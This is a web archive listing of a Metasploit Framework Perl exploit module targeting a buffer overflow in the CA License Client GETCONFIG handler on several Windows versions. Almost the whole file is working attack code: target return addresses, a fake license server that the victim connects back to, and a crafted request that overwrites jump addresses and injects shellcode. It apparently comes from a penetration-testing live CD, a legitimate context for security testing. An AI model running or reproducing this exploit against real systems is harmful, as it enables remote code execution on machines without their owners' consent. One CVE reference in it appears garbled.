home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / usr / lib / metasploit / exploits / calicclnt_getconfig.pm < prev    next >
Encoding:
Perl POD Document  |  2006-06-30  |  6.9 KB  |  232 lines
  1.  
  2. ##
  3. # This file is part of the Metasploit Framework and may be redistributed
  4. # according to the licenses defined in the Authors field below. In the
  5. # case of an unknown or missing license, this file defaults to the same
  6. # license as the core Framework (dual GPLv2 and Artistic). The latest
  7. # version of the Framework can always be obtained from metasploit.com.
  8. ##
  9.  
  10. package Msf::Exploit::calicclnt_getconfig;
  11. use base "Msf::Exploit";
  12. use strict;
  13. use Pex::Text;
  14.  
  15. use IO::Socket;
  16. use IO::Select;
  17.  
  18. my $advanced = { };
  19.  
  20. my $info =
  21.   {
  22.     'Name'  => 'CA License Client GETCONFIG Overflow',
  23.     'Version'  => '$Revision: 1.11 $',
  24.     'Authors' => [ 'Thor Doomen <syscall [at] hushmail.com>' ],
  25.     'Arch'  => [ 'x86' ],
  26.     'OS'    => [ 'win32', 'win2000', 'winxp', 'win2003' ],
  27.     'Priv'  => 1,
  28.     'AutoOpts'  => { 'EXITFUNC' => 'process' }, # avoid the ugly pop-up
  29.     'UserOpts'  => {
  30.         'RHOST' => [1, 'ADDR', 'The target address'],
  31.         'RPORT' => [1, 'PORT', 'The target port', 10203],
  32.       },
  33.  
  34.     'Payload' =>
  35.       {
  36.         'Space'        => 600,
  37.         'BadChars'    => "\x00\x20",
  38.         'Prepend'    => "\x81\xc4\x54\xf2\xff\xff",
  39.         'Keys'        => ['+ws2ord'],
  40.       },
  41.  
  42.     'Description'  => Pex::Text::Freeform(qq{
  43.         This module exploits an vulnerability in the CA License Client
  44.         service. This exploit will only work if your IP address will 
  45.         resolve to the target system. This can be accomplished on a local
  46.         network by running the 'nmbd' service that comes with Samba. If
  47.         you are running this exploit from Windows and do not filter udp
  48.         port 137, this should not be a problem (if the target is on the same
  49.         network segment). Due to the bugginess of the software, you are
  50.         only allowed one connection to the agent port before it starts
  51.         ignoring you. If it wasn't for this issue, it would be possible to
  52.         repeatedly exploit this bug.
  53.         
  54. }),
  55.  
  56.     'Refs'    =>
  57.       [
  58.           ['OSVDB', '14322'],
  59.         ['BID', '12705'],
  60.         ['CVE', '005-0581'],
  61.         ['URL', 'http://www.idefense.com/application/poi/display?id=213&type=vulnerabilities'],
  62.         ['MIL', '17'],        
  63.       ],
  64.  
  65.     'Targets' => [
  66.  
  67.         # As much as I would like to return back to the DLL or EXE,
  68.         # all of those modules have a leading NULL in the
  69.         # loaded @ address :(
  70.  
  71.         # name, jmp esi, writable, jmp edi
  72.         ['Automatic', 0],
  73.         ['Windows 2000 English',        0x750217ae, 0x7ffde0cc, 0x75021421], # ws2help.dll esi + peb + edi
  74.         ['Windows XP English SP0-1',    0x71aa16e5, 0x7ffde0cc, 0x71aa19e8], # ws2help.dll esi + peb + edi
  75.         ['Windows XP English SP2',        0x71aa1b22, 0x71aa5001, 0x71aa1e08], # ws2help.dll esi + .data + edi
  76.         ['Windows 2003 English SP0',    0x71bf175f, 0x7ffde0cc, 0x71bf1a2c], # ws2help.dll esi + peb + edi
  77.       ],
  78.     'Keys'  => ['calicense'],
  79.  
  80.     'DisclosureDate' => 'Mar 02 2005',
  81.   };
  82.  
  83. sub new {
  84.     my $class = shift;
  85.     my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
  86.     return($self);
  87. }
  88.  
  89. sub Exploit {
  90.     my $self = shift;
  91.     my $target_host = $self->GetVar('RHOST');
  92.     my $target_port = $self->GetVar('RPORT');
  93.     my $target_idx  = $self->GetVar('TARGET');
  94.     my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
  95.     my $target = $self->Targets->[$target_idx];
  96.  
  97.     my $server = IO::Socket::INET->new
  98.       (
  99.         'LocalPort' => 10202,
  100.         'Proto'     => 'tcp',
  101.         'ReuseAddr' => 1,
  102.         'Listen'    => 5,
  103.         'Blocking'  => 0,
  104.       );
  105.  
  106.     if (! $self->InitNops(128)) {
  107.         $self->PrintLine("[*] Failed to initialize the nop module.");
  108.         return;
  109.     }
  110.         
  111.     if (! $server) {
  112.         $self->PrintLine("[*] Could not start the fake CA License Server: $!");
  113.         return;
  114.     }
  115.     my $sel = IO::Select->new($server);
  116.  
  117.     # 1: Connect to the agent and send a request
  118.     my $s = Msf::Socket::Tcp->new
  119.       (
  120.         'PeerAddr'  => $target_host,
  121.         'PeerPort'  => $target_port,
  122.         'LocalPort' => $self->GetVar('CPORT'),
  123.         'SSL'       => $self->GetVar('SSL'),
  124.       );
  125.  
  126.     if ($s->IsError) {
  127.         $self->PrintLine("[*] Could not connect to the client agent");
  128.         $server->shutdown(2);
  129.         $server->close;
  130.         return;
  131.     }
  132.  
  133.     $s->Send("A0 GETSERVER<EOM>\n");
  134.     $self->PrintLine("[*] Waiting for the license agent to connect back...");
  135.  
  136.     my $r = $s->Recv(-1, 3);
  137.  
  138.     # 2: Wait for a connection from the agent back to us
  139.     my @ready = $sel->can_read(8);
  140.     if (! scalar(@ready)) {
  141.         $self->PrintLine("[*] No connection was received from the agent >:(");
  142.         $s->Close;
  143.         $server->shutdown(2);
  144.         $server->close;
  145.         return;
  146.     }
  147.  
  148.     # 3: Accept the connection and determine target type if needed
  149.     my $agent_soc = $ready[0]->accept();
  150.     my $agent = Msf::Socket::Tcp->new_from_socket($agent_soc);
  151.     $self->PrintLine("[*] Accepted connection from agent ".$agent->PeerAddr);
  152.  
  153.     if ($target_idx == 0) {
  154.  
  155.         $agent->Send("A0 GETCONFIG SELF 0<EOM>");
  156.         my $data = $agent->Recv(-1, 2);
  157.         
  158.         if ($data =~ m/OS\<([^\>]+)/) {
  159.             my $os = $1;
  160.             $os =~ s/_NT//g;
  161.             $os =~ s/5\.1/XP/;
  162.             $os =~ s/5\.2/2003/;
  163.             $os =~ s/5\.0/2000/;
  164.             $os =~ s/4\.0/NT 4.0/;
  165.  
  166.             my @targs;
  167.             for (1 .. (scalar(@{$self->Targets})-1)) {
  168.                 if (index($self->Targets->[$_]->[0], $os) != -1) {
  169.                     push @targs, $_;
  170.                 }
  171.             }
  172.  
  173.             if (scalar(@targs) > 1) {
  174.                 $self->PrintLine("[*] Multiple possible targets:");
  175.                 foreach (@targs) {
  176.                     $self->PrintLine("[*]  $_\t".$self->Targets->[$_]->[0]);
  177.                 }
  178.                 $self->PrintLine("[*] Picking the closest target and hoping...");
  179.                 return;
  180.             }
  181.  
  182.             if (scalar(@targs)) {
  183.                 $target = $self->Targets->[$targs[0]];
  184.             }
  185.  
  186.             if (! scalar(@targs)) {
  187.                 $self->PrintLine("[*] No matching target for $os");
  188.                 return;
  189.             }
  190.  
  191.         } else {
  192.             $self->PrintLine("[*] Could not determine the remote OS automatically");
  193.             return;
  194.         }
  195.     }
  196.  
  197.     $self->PrintLine("[*] Attempting to exploit target " . $target->[0]);
  198.  
  199.     my $boom = $self->MakeNops(900);
  200.  
  201.     ## exploits two different versions at once >:-)
  202.     # 144 -> return address of esi points to string middle
  203.     # 196 -> return address of edi points to string beginning    
  204.     # 148 -> avoid exception by patching with writable address
  205.     # 928 -> seh handler (not useful under XP SP2)
  206.     
  207.     substr($boom, 142, 2, "\xeb\x08");                    # jmp over addresses
  208.     substr($boom, 144, 4, pack('V', $target->[1]));     # jmp esi
  209.     substr($boom, 148, 4, pack('V', $target->[2]));     # writable address
  210.     substr($boom, 194, 2, "\xeb\x04");                    # jmp over address
  211.     substr($boom, 196, 4, pack('V', $target->[3]));        # jmp edi
  212.     
  213.     substr($boom, 272, length($shellcode), $shellcode);
  214.     
  215.     my $req = "A0 GETCONFIG SELF $boom<EOM>";
  216.  
  217.     $self->PrintLine("[*] Sending " .length($req) . " bytes to remote host.");
  218.     $agent->Send($req);
  219.  
  220.     $server->shutdown(2);
  221.     $agent->Close;
  222.     $s->Close;
  223.  
  224.     return;
  225. }
  226.  
  227. 1;
  228.  
  229. __DATA__
  230. eTrust: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.2>OLFFILE<0 0 0>SERVER<RMT>VERSION<0 1.61.0>NETWORK<192.168.3.22 unknown 255.255.255.0>MACHINE<PC_686_1_2084>CHECKSUMS<0 0 0 0 0 0 0 00 0 0 0>RMTV<1.3.1><EOM>
  231. BrightStor: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.1>OLFFILE<0 0 0>SERVER<RMT>VERSION<3 1.54.0>NETWORK<11.11.11.111 unknown 255.255.255.0>MACHINE<DESKTOP>CHECKSUMS<0 0 0 0 0 0 0 0 0 0 0 0>RMTV<1.00><EOM>
  232.